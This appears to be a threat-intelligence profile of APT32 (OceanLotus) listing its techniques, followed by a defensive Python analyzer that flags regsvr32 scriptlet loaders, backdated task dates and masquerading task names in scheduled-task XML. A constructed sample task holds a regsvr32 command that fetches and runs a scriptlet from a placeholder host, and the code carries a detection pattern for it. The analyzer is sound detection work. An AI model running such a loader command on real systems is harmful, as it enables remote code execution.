Group: APT32, OceanLotus Group

APT32, OceanLotus Group
ID G0050
Aliases APT32, OceanLotus Group

APT32 is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists. The group's operations are aligned with Vietnamese state interests.1

Alias Descriptions

  • APT32 - 1
  • OceanLotus Group - 1

Techniques Used

  • Scheduled Task - APT32 has used scheduled tasks to persist on victim systems.1
  • Regsvr32 - APT32 created a Scheduled Task that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory.1
  • PowerShell - APT32 has used PowerShell-based tools and shellcode loaders for execution.1
  • Timestomp - APT32 has used raw scheduled task XML with a backdated registration timestamp of June 2, 2016.1
  • Masquerading - APT32 has used hidden or non-printing characters to help masquerade file names on a system, such as appending a Unicode no-break space character to a legitimate service name.1
  • Valid Accounts - APT32 has used legitimate local admin account credentials.1
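Three of the techniques above leave artifacts in the same place, the scheduled task XML under %SystemRoot%\System32\Tasks: the regsvr32 COM scriptlet action, the backdated RegistrationInfo/Date, and a task name padded with a non-printing character. The following analyzer is an added example, not code from MITRE ATT&CK or from the APT32 reports cited on this page. It parses task XML offline and flags those three artifacts; the sample tasks, the task names, the URL and the file creation time are all constructed placeholders, not indicators from any report.

```python
"""Added example (not from MITRE ATT&CK or the cited APT32 reports): an offline
analyzer for Windows Task Scheduler XML that flags regsvr32 loading a COM
scriptlet, a RegistrationInfo/Date that predates the task file on disk
(timestomping), and a task name padded with non-printing Unicode characters.
All sample data, names and URLs below are constructed placeholders."""
import re
import unicodedata
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

# Namespace used by Windows Task Scheduler XML task files.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample resembling the described tradecraft: the task name ends
# in U+00A0 (no-break space), the registration date is backdated to
# June 2, 2016, and the action runs regsvr32 against a remote scriptlet.
# The URL is a placeholder, not an indicator from any report.
SUSPICIOUS_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2016-06-02T10:00:00</Date>
    <URI>\\Microsoft\\Windows\\Defrag\\ScheduledDefrag\u00a0</URI>
  </RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>regsvr32.exe</Command>
      <Arguments>/s /n /u /i:http://example.invalid/update.sct scrobj.dll</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task for comparison: plain name, date consistent with
# the file on disk, and an ordinary executable as the action.
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2017-03-01T09:00:00</Date>
    <URI>\\Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI>
  </RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\\system32\\defrag.exe</Command>
      <Arguments>-c -h -o</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed NTFS creation time for both sample files (in practice read from
# the file system; supplied here so the example runs offline).
SAMPLE_FILE_CREATED = datetime(2017, 3, 1, 9, 0, 30)


def nonprinting_chars(name: str) -> list[str]:
    """Code points in a task or service name that do not print visibly.
    Ordinary ASCII space is allowed; no-break space (U+00A0), zero-width
    and control characters are not."""
    return [f"U+{ord(c):04X}" for c in name
            if c != " " and unicodedata.category(c) in ("Zs", "Cf", "Cc")]


def is_com_scriptlet_exec(command: str, arguments: str) -> bool:
    """regsvr32 told to load scrobj.dll with an /i: (or -i:) argument runs a
    COM scriptlet; with a URL in /i: the scriptlet is fetched at run time."""
    exe = command.strip().strip('"').lower().rsplit("\\", 1)[-1]
    args = arguments.lower()
    return (exe == "regsvr32.exe" and "scrobj.dll" in args
            and re.search(r"(^|\s)[-/]i:", args) is not None)


def analyze_task(xml_text: str, file_created: datetime,
                 tolerance: timedelta = timedelta(hours=1)) -> list[tuple[str, str]]:
    """Return (finding, detail) pairs for one task XML document."""
    root = ET.fromstring(xml_text)
    findings: list[tuple[str, str]] = []

    reg = root.find("t:RegistrationInfo", NS)
    uri = reg.findtext("t:URI", default="", namespaces=NS) if reg is not None else ""
    date_text = reg.findtext("t:Date", default="", namespaces=NS) if reg is not None else ""

    # Masquerading: a trailing non-printing character makes the name look
    # identical to a legitimate task in most UIs while being a distinct object.
    bad = nonprinting_chars(uri)
    if bad:
        findings.append(("masquerade", f"task name {uri!r} contains {', '.join(bad)}"))

    # Timestomp: RegistrationInfo/Date is author-controlled text, so a value
    # far older than the file that carries it was backdated. Built-in Windows
    # tasks can legitimately show an old Date, so correlate with the action.
    if date_text:
        gap = file_created - datetime.fromisoformat(date_text)
        if gap > tolerance:
            findings.append(("timestomp",
                             f"Date {date_text} predates file creation by {gap.days} days"))

    # Regsvr32: the COM scriptlet loader pattern in the task's Exec action.
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS)
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        if is_com_scriptlet_exec(cmd, args):
            findings.append(("com_scriptlet", f"{cmd} {args}"))
    return findings


def demo() -> dict[str, list[tuple[str, str]]]:
    """Run the analyzer over both constructed samples."""
    return {"suspicious": analyze_task(SUSPICIOUS_TASK_XML, SAMPLE_FILE_CREATED),
            "benign": analyze_task(BENIGN_TASK_XML, SAMPLE_FILE_CREATED)}


if __name__ == "__main__":
    for label, found in demo().items():
        print(label, found or "no findings")
```

On a live system the XML would be read from each file under %SystemRoot%\System32\Tasks (UTF-16 on disk) and file_created from its NTFS creation time; the date check is a lead to correlate with the task's action rather than proof on its own, since legitimate Microsoft tasks can also carry a Date older than the file.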